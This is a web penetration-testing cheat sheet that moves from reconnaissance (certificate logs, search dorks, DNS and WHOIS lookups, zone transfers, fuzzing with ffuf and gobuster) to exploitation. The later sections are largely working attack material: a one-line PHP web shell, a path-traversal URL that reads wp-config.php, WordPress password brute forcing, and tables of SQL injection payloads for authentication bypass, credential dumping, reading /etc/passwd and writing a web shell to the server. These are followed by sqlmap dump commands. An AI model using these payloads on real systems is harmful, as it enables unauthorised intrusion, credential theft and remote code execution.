Web pentest cheatsheet
Information Gathering
Consider using web spiders such as ParseHub, SpiderFoot, and Web Data Extractor to extract data from websites.
Certificate Transparency (CT) Logs
Certificate Transparency (CT) logs offer a treasure trove of subdomain information for passive reconnaissance. These publicly accessible logs record SSL/TLS certificates issued for domains and their subdomains, serving as a security measure to prevent fraudulent certificates. For reconnaissance, they offer a window into potentially overlooked subdomains.
The crt.sh website provides a searchable interface for CT logs. To efficiently extract subdomains using crt.sh within your terminal, you can use a command like this:
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
This command fetches JSON-formatted data from crt.sh for example.com (the %25 is a URL-encoded % wildcard), extracts domain names using jq, removes any wildcard prefixes (*.) with sed, and finally sorts and deduplicates the results.
# jq's select() filters the JSON results, keeping only entries where the name_value field (which contains the domain or subdomain) includes the string "dev". The -r flag tells jq to output raw strings.
curl -s "https://crt.sh/?q=facebook.com&output=json" | jq -r '.[] | select(.name_value | contains("dev")) | .name_value' | sort -u
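A slight variation (assuming crt.sh's JSON output also includes a common_name field, as it does at the time of writing) captures certificate common names as well:
Code: bash
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[] | .common_name, .name_value' | sed 's/\*\.//g' | sort -u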
https://search.censys.io/ is also a great resource for internet-connected devices, with advanced filtering by domain, IP, or certificate attributes.
Web Crawling
Web crawling is the automated exploration of a website's structure. A web crawler, or spider, systematically navigates through web pages by following links, mimicking a user's browsing behavior. This process maps out the site's architecture and gathers valuable information embedded within the pages.
A crucial file that guides web crawlers is robots.txt. This file resides in a website's root directory and dictates which areas are off-limits for crawlers. Analyzing robots.txt can reveal hidden directories or sensitive areas that the website owner doesn't want indexed by search engines.
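A quick manual review of robots.txt only takes one request; a minimal sketch:
Code: bash
# Fetch the file, then list only the disallowed paths for follow-up inspection
curl -s https://example.com/robots.txt
curl -s https://example.com/robots.txt | grep -i '^Disallow:' | awk '{print $2}'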
Scrapy is a powerful and efficient Python framework for large-scale web crawling and scraping projects. It provides a structured approach to defining crawling rules, extracting data, and handling various output formats. Here's a basic Scrapy spider example to extract links from example.com:
Code: python
#Install Scrapy
pip3 install scrapy --break-system-packages
#Install ReconSpider and unzip it
wget https://academy.hackthebox.com/storage/modules/279/ ; unzip ReconSpider.zip
#Run ReconSpider; this will crawl the given website and save the results to results.json
python3 ReconSpider.py <URL>
#Generate a spider for a given domain; the generated file will use the name you specify
scrapy genspider [options] <name> <domain>
#Generate a spider using a predefined template
scrapy genspider -t crawl crawlinlane http://example.com
#Run the generated spider
scrapy runspider <GeneratedSpiderFileName>
#Example spider generated with Scrapy
import scrapy

class ExampleSpider(scrapy.Spider):
    name = "example"
    start_urls = ['http://example.com/']
    # File extensions worth flagging (assumed list; adjust to your target)
    interesting_extensions = ['.pdf', '.docx', '.xlsx', '.sql', '.zip', '.bak']

    def parse(self, response):
        for link in response.css('a::attr(href)').getall():
            if any(link.endswith(ext) for ext in self.interesting_extensions):
                # Yield interesting files as items instead of following them
                yield {"file": link}
            elif not link.startswith("#") and not link.startswith("mailto:"):
                # Follow regular links recursively
                yield response.follow(link, callback=self.parse)
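To run the spider above and persist the items (assuming it is saved as example_spider.py), Scrapy's -o flag writes the collected items to a JSON file:
Code: bash
scrapy runspider example_spider.py -o example_data.json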
After running the Scrapy spider, you'll have a file containing scraped data (e.g., example_data.json). You can analyze these results using standard command-line tools. For instance, to extract all links:
Code: bash
jq -r '.[] | select(.file != null) | .file' example_data.json | sort -u
This command uses jq to extract all file links and sort -u to deduplicate them. You can push the list further, e.g., isolating file extensions with awk and counting them with uniq -c. By scrutinizing the extracted data, you can identify patterns, anomalies, or sensitive files that might be of interest for further investigation.
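A sketch of that extension count, assuming the same example_data.json structure:
Code: bash
# Isolate the extension (last dot-separated field, a rough heuristic) and count occurrences
jq -r '.[] | select(.file != null) | .file' example_data.json | awk -F. 'NF>1 {print $NF}' | sort | uniq -c | sort -rn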
Search Engine Discovery
Leveraging search engines for reconnaissance involves utilizing their vast indexes of web content to uncover information about your target. This passive technique, often referred to as Open Source Intelligence (OSINT) gathering, can yield valuable insights without directly interacting with the target's systems.
By employing advanced search operators and specialized queries known as "Google Dorks," you can pinpoint specific information buried within search results. Here's a table of some useful search operators for web reconnaissance:
| Operator | Description | Example | Example Description |
| --- | --- | --- | --- |
| `site:` | Limits results to a specific website or domain. | `site:example.com` | Find all publicly accessible pages on example.com. |
| `inurl:` | Finds pages with a specific term in the URL. | `inurl:login` | Search for login pages on any website. |
| `filetype:` | Searches for files of a particular type. | `filetype:pdf` | Find downloadable PDF documents. |
| `intitle:` | Finds pages with a specific term in the title. | `intitle:"confidential report"` | Look for documents titled "confidential report" or similar variations. |
| `intext:` or `inbody:` | Searches for a term within the body text of pages. | `intext:"password reset"` | Identify webpages containing the term "password reset". |
| `cache:` | Displays the cached version of a webpage (if available). | `cache:example.com` | View the cached version of example.com to see its previous content. |
| `link:` | Finds pages that link to a specific webpage. | `link:example.com` | Identify websites linking to example.com. |
| `related:` | Finds websites related to a specific webpage. | `related:example.com` | Discover websites similar to example.com. |
| `info:` | Provides a summary of information about a webpage. | `info:example.com` | Get basic details about example.com, such as its title and description. |
| `define:` | Provides definitions of a word or phrase. | `define:phishing` | Get a definition of "phishing" from various sources. |
| `numrange:` | Searches for numbers within a specific range. | `site:example.com numrange:1000-2000` | Find pages on example.com containing numbers between 1000 and 2000. |
| `allintext:` | Finds pages containing all specified words in the body text. | `allintext:admin password reset` | Search for pages containing both "admin" and "password reset" in the body text. |
| `allinurl:` | Finds pages containing all specified words in the URL. | `allinurl:admin panel` | Look for pages with "admin" and "panel" in the URL. |
| `allintitle:` | Finds pages containing all specified words in the title. | `allintitle:confidential report 2023` | Search for pages with "confidential," "report," and "2023" in the title. |
| `AND` | Narrows results by requiring all terms to be present. | `site:example.com AND (inurl:admin OR inurl:login)` | Find admin or login pages specifically on example.com. |
| `OR` | Broadens results by including pages with any of the terms. | `"linux" OR "ubuntu" OR "debian"` | Search for webpages mentioning Linux, Ubuntu, or Debian. |
| `NOT` | Excludes results containing the specified term. | `site:bank.com NOT inurl:login` | Find pages on bank.com excluding login pages. |
| `*` (wildcard) | Represents any character or word. | `site:socialnetwork.com filetype:pdf user* manual` | Search for user manuals (user guide, user handbook) in PDF format on socialnetwork.com. |
| `..` (range search) | Finds results within a specified numerical range. | `site:ecommerce.com "price" 100..500` | Look for products priced between 100 and 500 on an e-commerce website. |
| `" "` (quotation marks) | Searches for exact phrases. | `"information security policy"` | Find documents mentioning the exact phrase "information security policy". |
| `-` (minus sign) | Excludes terms from the search results. | `site:news.com -inurl:sports` | Search for news articles on news.com excluding sports-related content. |
Google Dorking
Google Dorking, also known as Google Hacking, is a technique that leverages the power of search operators to uncover sensitive information, security vulnerabilities, or hidden content on websites, using Google Search.
Here are some common examples of Google Dorks; for more examples, refer to the Google Hacking Database:
Finding Login Pages:
site:example.com inurl:login
site:example.com (inurl:login OR inurl:admin)
Identifying Exposed Files:
site:example.com filetype:pdf
site:example.com (filetype:xls OR filetype:docx)
Uncovering Configuration Files:
site:example.com inurl:config.php
site:example.com (ext:conf OR ext:cnf)
(searches for extensions commonly used for configuration files)
Locating Database Backups:
site:example.com inurl:backup
site:example.com filetype:sql
By creatively combining these operators and crafting targeted queries, you can uncover sensitive documents, exposed directories, login pages, and other valuable information that may aid in your reconnaissance efforts.
There is a good resource I found that lets you generate interesting queries for GitHub, Shodan, and Google:
Web Archive
The Wayback Machine is a digital archive of the World Wide Web. It allows users to go back in time and view snapshots of a website. The Wayback Machine operates by using web crawlers to capture snapshots of websites at regular intervals. These crawlers navigate through the web, following links and indexing pages, much like search engine crawlers. However, instead of simply indexing the information for search purposes, the Wayback Machine stores the entire content of the pages, including HTML, CSS, JavaScript, images, and other resources. Factors that influence the capture frequency include the website's popularity, its rate of change, and the resources available to the Internet Archive.
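Beyond the web interface, the Internet Archive exposes a CDX API that is convenient for enumerating archived URLs from the terminal; a minimal sketch:
Code: bash
# List unique archived URLs for a domain via the Wayback CDX API
curl -s "http://web.archive.org/cdx/search/cdx?url=example.com/*&fl=original&collapse=urlkey" | sort -u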
Automated reconnaissance tools
These frameworks aim to provide a complete suite of tools for web reconnaissance:
FinalRecon: A Python-based reconnaissance tool offering a range of modules for different tasks like SSL certificate checking, Whois information gathering, header analysis, and crawling. Its modular structure enables easy customisation for specific needs.
Recon-ng: A powerful framework written in Python that offers a modular structure with various modules for different reconnaissance tasks. It can perform DNS enumeration, subdomain discovery, port scanning, web crawling, and even exploit known vulnerabilities.
theHarvester: Specifically designed for gathering email addresses, subdomains, hosts, employee names, open ports, and banners from different public sources like search engines, PGP key servers, and the SHODAN database. It is a command-line tool written in Python.
SpiderFoot: An open-source intelligence automation tool that integrates with various data sources to collect information about a target, including IP addresses, domain names, email addresses, and social media profiles. It can perform DNS lookups, web crawling, port scanning, and more.
OSINT Framework: A collection of various tools and resources for open-source intelligence gathering. It covers a wide range of information sources, including social media, search engines, public records, and more.
#FinalRecon
git clone https://github.com/thewhiteh4t/FinalRecon.git
cd FinalRecon
pip3 install -r requirements.txt
chmod +x ./finalrecon.py
./finalrecon.py --help
./finalrecon.py --url <PUTUrlHere> --sslinfo
./finalrecon.py --headers --whois --url <URL>
Perform Web Security Reconnaissance with Skipfish
skipfish -o /home/attacker/test -S /usr/share/skipfish/dictionaries/complete.wl http://[IP_Address]:8080
Use httprecon for general web reconnaissance. An example invocation:
httprecon http://targetsite.com
Subdomain Guessing
To use dnsenum for subdomain brute-forcing, you'll typically provide it with the target domain and a wordlist containing potential subdomain names. The tool will then systematically query the DNS server for each potential subdomain and report any that exist.
-r: This option enables recursive subdomain brute-forcing, meaning that if dnsenum finds a subdomain, it will then try to enumerate subdomains of that subdomain.
dnsenum example.com -f subdomains.txt
dnsenum --enum inlanefreight.com -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -r
DNS
The Domain Name System (DNS) functions as the internet's GPS, translating user-friendly domain names into the numerical IP addresses computers use to communicate. Like GPS converting a destination's name into coordinates, DNS ensures your browser reaches the correct website by matching its name with its IP address. This eliminates memorizing complex numerical addresses, making web navigation seamless and efficient.
The dig command allows you to query DNS servers directly, retrieving specific information about domain names. For instance, if you want to find the IP address associated with example.com, you can execute the following command:
dig example.com A
dig -x 192.0.2.1 #reverse lookup: get the PTR record for an IP address (-x takes an IP, not a hostname)
dig example.com MX
dig example.com NS
dig example.com AAAA
dig axfr @nsztm1.digi.ninja zonetransfer.me #request a full zone transfer (AXFR) from the DNS server responsible for zonetransfer.me
This command instructs dig to query the DNS for the A record (which maps a hostname to an IPv4 address) of example.com. The output will typically include the requested IP address, along with additional details about the query and response. By mastering the dig command and understanding the various DNS record types, you gain the ability to extract valuable information about a target's infrastructure and online presence.
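For scripting, dig's +short flag trims the output to just the answer section:
Code: bash
dig +short example.com A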
WHOIS
Before using the whois command, you'll need to ensure it's installed on your Linux system. It's a utility available through Linux package managers, and if it's not installed, it can be installed simply with:
Utilising WHOIS
sudo apt update
sudo apt install whois -y
The simplest way to access WHOIS data is through the whois command-line tool. Let's perform a WHOIS lookup on facebook.com:
Utilising WHOIS
whois facebook.com
Domain Name: FACEBOOK.COM
Registry Domain ID: 2320948_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.registrarsafe.com
Registrar URL: http://www.registrarsafe.com
Updated Date: 2024-04-24T19:06:12Z
Creation Date: 1997-03-29T05:00:00Z
Registry Expiry Date: 2033-03-30T04:00:00Z
Registrar: RegistrarSafe, LLC
Registrar IANA ID: 3237
Registrar Abuse Contact Email: abusecomplaints@registrarsafe.com
Registrar Abuse Contact Phone: +1-650-308-7004
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: A.NS.FACEBOOK.COM
Name Server: B.NS.FACEBOOK.COM
Name Server: C.NS.FACEBOOK.COM
Name Server: D.NS.FACEBOOK.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2024-06-01T11:24:10Z <<<
[...]
Registry Registrant ID:
Registrant Name: Domain Admin
Registrant Organization: Meta Platforms, Inc.
[...]
The WHOIS output for facebook.com reveals several key details:

Domain Registration:
- Registrar: RegistrarSafe, LLC
- Creation Date: 1997-03-29
- Expiry Date: 2033-03-30

These details indicate that the domain is registered with RegistrarSafe, LLC, and has been active for a considerable period, suggesting its legitimacy and established online presence. The distant expiry date further reinforces its longevity.

Domain Owner:
- Registrant/Admin/Tech Organization: Meta Platforms, Inc.
- Registrant/Admin/Tech Contact: Domain Admin

This information identifies Meta Platforms, Inc. as the organization behind facebook.com, and "Domain Admin" as the point of contact for domain-related matters. This is consistent with the expectation that Facebook, a prominent social media platform, is owned by Meta Platforms, Inc.

Domain Status:
- clientDeleteProhibited, clientTransferProhibited, clientUpdateProhibited, serverDeleteProhibited, serverTransferProhibited, and serverUpdateProhibited

These statuses indicate that the domain is protected against unauthorized changes, transfers, or deletions on both the client and server sides. This highlights a strong emphasis on security and control over the domain.

Name Servers:
- A.NS.FACEBOOK.COM, B.NS.FACEBOOK.COM, C.NS.FACEBOOK.COM, D.NS.FACEBOOK.COM

These name servers are all within the facebook.com domain, suggesting that Meta Platforms, Inc. manages its own DNS infrastructure. It is common practice for large organizations to maintain control and reliability over their DNS resolution.

Overall, the WHOIS output for facebook.com aligns with expectations for a well-established and secure domain owned by a large organization like Meta Platforms, Inc.
While the WHOIS record provides contact information for domain-related issues, it might not be directly helpful in identifying individual employees or specific vulnerabilities. This highlights the need to combine WHOIS data with other reconnaissance techniques to understand the target's digital footprint comprehensively.
Zone Transfers
DNS zone transfers, also known as AXFR (Asynchronous Full Transfer) requests, offer a potential goldmine of information for web reconnaissance. A zone transfer is a mechanism for replicating DNS data across servers. When a zone transfer is successful, it provides a complete copy of the DNS zone file, which contains a wealth of details about the target domain.
To attempt a zone transfer, you can use the dig command with the axfr (full zone transfer) option. For example, to request a zone transfer from the DNS server ns1.example.com for the domain example.com, you would execute:
Code: bash
dig @ns1.example.com example.com axfr
However, zone transfers are not always permitted. Many DNS servers are configured to restrict zone transfers to authorized secondary servers only. Misconfigured servers, though, may allow zone transfers from any source, inadvertently exposing sensitive information.
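Since any of a domain's authoritative name servers might be the misconfigured one, it is worth attempting the transfer against each NS record; a small loop sketch:
Code: bash
# Try AXFR against every authoritative name server for the domain
for ns in $(dig +short NS example.com); do
    echo "[*] Attempting zone transfer against $ns"
    dig @"$ns" example.com axfr
done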
Guess Virtualhosts
Virtual hosting is a technique that allows multiple websites to share a single IP address. Each website is associated with a unique hostname, which is used to direct incoming requests to the correct site. This can be a cost-effective way for organizations to host multiple websites on a single server, but it can also create a challenge for web reconnaissance.
Since multiple websites share the same IP address, simply scanning the IP won't reveal all the hosted sites. You need a tool that can test different hostnames against the IP address to see which ones respond.
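Before reaching for a dedicated tool, you can probe candidate hostnames manually by overriding the Host header with curl; a sketch assuming target IP 192.0.2.1 and a hostnames.txt wordlist:
Code: bash
# Responses that differ (status code or size) from the default vhost are worth a closer look
while read -r vhost; do
    code=$(curl -s -o /dev/null -w "%{http_code}" -H "Host: ${vhost}.example.com" "http://192.0.2.1/")
    echo "$code ${vhost}.example.com"
done < hostnames.txt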
Gobuster is a versatile tool that can be used for various types of brute-forcing, including virtual host discovery. Its vhost mode is designed to enumerate virtual hosts by sending requests to the target IP address with different hostnames. If a virtual host is configured for a specific hostname, Gobuster will receive a response from the web server. To use Gobuster to brute-force virtual hosts, you'll need a wordlist containing potential hostnames. Here's an example command:
#First identify the IP address and add it to your /etc/hosts file. -t increases the number of threads; --append-domain is only available on newer versions
gobuster vhost -u http://192.0.2.1 -w hostnames.txt --append-domain -t 200
gobuster vhost -u http://thetoppers.htb:PORT -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
Guess Subdomains with Wfuzz
Use Wfuzz to replace "FUZZ" with words from your wordlist to identify subdomains:
sudo wfuzz -c -f fuzzthetoppers.txt -Z -w /home/SecLists/Discovery/DNS/subdomains-top1million-5000.txt FUZZ.thetoppers.htb
You can also fuzz for files with a specific extension by appending it to the FUZZ keyword in the URL, and filter responses with flags such as --hl (hide responses with a given line count):
wfuzz -c -w /usr/share/wordlists/wfuzz/general/common.txt -b "PHPSESSID=8v1ktin9mia013dhurccn4fae3; security=low" -u http://127.0.0.1:42001/vulnerabilities/fi/?page=../../hackable/flags/FUZZ.php --hl 82
Web Fuzzing and directory discovery
Fuzzing with ffuf
# Install ffuf
apt install ffuf -y
# Display ffuf help
ffuf -h
# Directory Fuzzing in silent mode to show only the results matching the code 200
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -s -c -mc 200
#Fuzz for the index file, which can be found on most websites, to identify the extension used by the webserver
ffuf -w /opt/useful/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://SERVER_IP:PORT/blog/indexFUZZ
#Multiple fuzzing: for directories and for extensions
ffuf -w /opt/useful/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ_2 -w /opt/useful/seclists/Discovery/Web-Content/directory-list-1.0.txt:FUZZ_1 -u http://83.136.251.174:36820/blog/FUZZ_1FUZZ_2 -c -mc 200
#Recursive scanning with the -recursion flag automatically scans newly identified directories. Specify the recursion depth with -recursion-depth NR. -v prints the full URLs and -e fuzzes for a specific extension
ffuf -w /opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://83.136.251.174:36820/FUZZ -recursion -recursion-depth 1 -e .php -v
# Extension Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ
# Page Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php
# Recursive Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v
# Sub-domain Fuzzing
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.example.com/
# VHost Fuzzing - with -fs you can filter out (remove) those with a specific content-size
ffuf -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://example.com:PORT/ -H 'Host: FUZZ.example.com' -fs xxx
# Parameter Fuzzing - GET
ffuf -w seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.example.com:PORT/admin/admin.php?FUZZ=key -fs xxx
# Parameter Fuzzing - POST
ffuf -w wordlist.txt:FUZZ -u http://admin.example.com:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
# Fuzzing with specified IDs
ffuf -w ids.txt:FUZZ -u http://admin.example.com:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
Guess Directories Using Gobuster
Use Gobuster to guess directories and subdomains of a specific web application:
gobuster dir -u http://targetsite.com -w /path/wordlist.txt
Note: You can use wordlists located in /usr/share/wordlists/*.
Directory Enumeration with Nmap
Use Nmap to enumerate directories on a target website:
nmap -sV --script=http-enum [target_website]
You can also use Burp Suite Intruder and DirBuster to discover content on the web application.
# Directory Brute Forcing using Gobuster
gobuster dir -u http://172.25.210.128 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
# Directory Brute Forcing with FFUF
ffuf -u http://172.25.20.6:5985/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt
These commands discover directories and files on a web server; the content they reveal can expose vulnerabilities and entry points that may allow unauthorized access or command execution on the server.
Uniscan for Footprinting
Footprint a website for web directory structure:
uniscan -u http://10.10.1.22:8080/CEH -q
Perform a dynamic scan to extract emails, backdoors, and external hosts:
uniscan -u http://10.10.1.22:8080/CEH -d
Wordpress enumeration
# Directory traversal on a vulnerable wordpress plugin. This approach uses the 'ebook-download' plugin to access sensitive files.
http://www.cpent.com/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
# Enumerate WordPress plugins on the given URL to identify potential vulnerabilities.
wpscan --url http://www.cpent.com --enumerate p
# Use the API token for authenticated scanning of WordPress plugins.
wpscan --url http://172.25.210.128 --api-token <API Token Here>
# MSF module to enumerate WordPress usernames and brute-force logins
Use auxiliary/scanner/http/wordpress_login_enum
# Perform brute force attack to crack WordPress password. Uses common passwords from a predefined list.
wpscan --url http://172.25.210.128 -U psychotic_animal -P /usr/share/seclists/Passwords/xa
Detect host mappings using:
nmap --script hostmap-bfk --script-args hostmap-bfk.prefix=hostmap- www.goodshopping.com
Detect web application firewalls:
nmap -p80 --script http-waf-detect www.goodshopping.com
Trace HTTP requests:
nmap --script http-trace -d www.goodshopping.com
Banner Grabbing
whatweb inlanefreight.com
# Extract headers with Curl to get info on used technology
curl -I inlanefreight.com
#wafw00f fingerprints WAFs; e.g., a scan on inlanefreight.com reveals the site is protected by the Wordfence Web Application Firewall (WAF), developed by Defiant.
pip3 install git+https://github.com/EnableSecurity/wafw00f
wafw00f inlanefreight.com
# Nikto's fingerprinting capabilities provide insights into a website's technology stack.
nikto -h inlanefreight.com -Tuning b #-Tuning b flag tells Nikto to only run the Software Identification modules.
https://www.wappalyzer.com/ web extension can also be used to identify website technologies
https://builtwith.com/ is a Web technology profiler that provides detailed reports on a website's technology stack.
nc -vv www.moviescope.com 80
telnet www.moviescope.com 80
Webshells
#Create a php webshell with the b374k script packer
cd b374k-master
php -f index.php -- -o shell.php -s -b -z gzcompress -c 9
#Php webshell to execute cmd commands
<?php echo system($_POST['cmd']); ?>
SQL Injection Testing
SQLi Discovery
Before we start subverting the web application's logic and attempting to bypass the authentication, we first have to test whether the login form is vulnerable to SQL injection. To do that, we will try to add one of the below payloads after our username and see if it causes any errors or changes how the page behaves:
In some cases, we may have to use the URL-encoded version of the payload, for example when we put our payload directly in the URL (i.e., an HTTP GET request).
| Payload | URL-Encoded |
| --- | --- |
| `'` | `%27` |
| `"` | `%22` |
| `#` | `%23` |
| `;` | `%3B` |
| `)` | `%29` |
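As a quick manual check, you can send a payload with curl and watch for SQL errors or behavioral changes. A minimal sketch, assuming a hypothetical login.php with username/password fields:
Code: bash
# A stray single quote in the username may trigger a SQL syntax error if input is unsanitized
curl -s -X POST "http://SERVER_IP:PORT/login.php" --data "username=admin'&password=test"
# For payloads placed directly in the URL, use the URL-encoded form (' becomes %27)
curl -s "http://SERVER_IP:PORT/search.php?q=test%27"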
MySQL
General

| Command | Description |
| --- | --- |
| `mysql -u root -h docker.hackthebox.eu -P 3306 -p` | Log in to a MySQL database |
| `SHOW DATABASES` | List available databases |
| `USE users` | Switch to database |

Tables

| Command | Description |
| --- | --- |
| `CREATE TABLE logins (id INT, ...)` | Add a new table |
| `SHOW TABLES` | List available tables in current database |
| `DESCRIBE logins` | Show table properties and columns |
| `INSERT INTO table_name VALUES (value_1, ...)` | Add values to table |
| `INSERT INTO table_name(column2, ...) VALUES (column2_value, ...)` | Add values to specific columns in a table |
| `UPDATE table_name SET column1=newvalue1, ... WHERE <condition>` | Update table values |

Columns

| Command | Description |
| --- | --- |
| `SELECT * FROM table_name` | Show all columns in a table |
| `SELECT column1, column2 FROM table_name` | Show specific columns in a table |
| `DROP TABLE logins` | Delete a table |
| `ALTER TABLE logins ADD newColumn INT` | Add new column |
| `ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn` | Rename column |
| `ALTER TABLE logins MODIFY oldColumn DATE` | Change column datatype |
| `ALTER TABLE logins DROP oldColumn` | Delete column |

Output

| Command | Description |
| --- | --- |
| `SELECT * FROM logins ORDER BY column_1` | Sort by column |
| `SELECT * FROM logins ORDER BY column_1 DESC` | Sort by column in descending order |
| `SELECT * FROM logins ORDER BY column_1 DESC, id ASC` | Sort by two columns |
| `SELECT * FROM logins LIMIT 2` | Only show first two results |
| `SELECT * FROM logins LIMIT 1, 2` | Only show first two results starting from index 2 |
| `SELECT * FROM table_name WHERE <condition>` | List results that meet a condition |
| `SELECT * FROM logins WHERE username LIKE 'admin%'` | List results where the name is similar to a given string |
MySQL Operator Precedence
1. Division (`/`), Multiplication (`*`), and Modulus (`%`)
2. Addition (`+`) and Subtraction (`-`)
3. Comparison (`=`, `>`, `<`, `<=`, `>=`, `!=`, `LIKE`)
4. NOT (`!`)
5. AND (`&&`)
6. OR (`||`)
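Precedence matters for injection payloads: because AND binds tighter than OR, the query below still returns every row even when the password check fails. A minimal illustration, assuming a hypothetical logins table:
Code: sql
SELECT * FROM logins WHERE username = 'admin' AND password = 'wrong' OR '1' = '1';
-- Evaluated as: (username = 'admin' AND password = 'wrong') OR ('1' = '1'), which is always true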
SQL Injection
Auth Bypass

| Payload | Description |
| --- | --- |
| `admin' or '1'='1` | Basic auth bypass |
| `admin' or 1 = 1 -- -` | Auth bypass with comments |
| `admin')-- -` | Auth bypass with comments |

Union Injection

| Payload | Description |
| --- | --- |
| `' order by 1-- -` | Detect number of columns using ORDER BY |
| `cn' UNION select 1,2,3-- -` | Detect number of columns using UNION injection |
| `cn' UNION select 1,@@version,3,4-- -` | Basic UNION injection |
| `UNION select username, 2, 3, 4 from passwords-- -` | UNION injection for 4 columns |

DB Enumeration

| Payload | Description |
| --- | --- |
| `SELECT @@version` | Fingerprint MySQL with query output |
| `SELECT SLEEP(5)` | Fingerprint MySQL with no output |
| `cn' UNION select 1,database(),2,3-- -` | Current database name |
| `cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -` | List all databases |
| `cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -` | List all tables in a specific database |
| `cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -` | List all columns in a specific table |
| `cn' UNION select 1, username, password, 4 from dev.credentials-- -` | Dump data from a table in another database |

Privileges

| Payload | Description |
| --- | --- |
| `cn' UNION SELECT 1, user(), 3, 4-- -` | Find current user |
| `cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -` | Find if user has admin privileges |
| `cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -` | List all user privileges |
| `cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -` | Find which directories can be accessed through MySQL |

File Injection

| Payload | Description |
| --- | --- |
| `cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -` | Read local file |
| `select 'file written successfully!' into outfile '/var/www/html/proof.txt'` | Write a string to a local file |
| `cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -` | Write a web shell into the base web directory |
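If the web shell write above succeeds, you can trigger it from the command line; the 0 parameter maps to $_REQUEST[0] in the payload:
Code: bash
curl "http://SERVER_IP/shell.php?0=id"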
SQLMAP
Use the following commands to test a specific URL or a captured request for SQL injection vulnerabilities:
sqlmap -u <IP_or_URL> # Test a target URL directly
sqlmap -r <requestFile> # Test SQLi using a request file containing the full HTTP request, e.g., one exported from Burp
SQLMAP CheatSheet
sudo apt install sqlmap # Installation from Linux Distribution
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev # Manual installation (Linux/Windows)
python sqlmap.py # Run sqlmap from the cloned repository
sqlmap -h # View the basic help menu
sqlmap -hh # View the advanced help menu
# Test for SQLi vulnerabilities
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch # Run SQLMap without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test' # SQLMap with POST request
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test' # POST request specifying an injection point with an asterisk
sqlmap -r req.txt # Passing an HTTP request file to SQLMap
sqlmap -u http://192.168.202.162/cat.php?id=1 -p id --proxy="http://localhost:8080" # Redirect traffic to your proxy MiTM
sqlmap -u http://192.168.202.162/cat.php?id=1 --union-cols=17 --union-from=users # FineTuning Union SQLI
sqlmap -u http:/... --cookie="PHPSESSID=j9c5bkd3oiaskl5ii7je5q2s0q" # Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUT # Specifying a PUT request
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt # Store traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch # Specify verbosity level
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -" # Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5 --risk=3 # Specifying the level and risk
sqlmap -u http://192.168.202.162/cat.php?id=1 --technique=BEQSTU # Choose a specific SQLi technique B, E, Q, S, T, U
# Dump data
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba # Basic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb # Table enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3 # Extract only the 2de and stop and the 3de row
sqlmap -u "http://www.example.com/?id=1" --dump -D testdb #Dump the entire table
qlmap -u "http://www.example.com/?id=1" --dump-all --exclude-sysdbs # Dump all DB's except the sysdbs whichle are little of interest
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname # Table/row enumeration
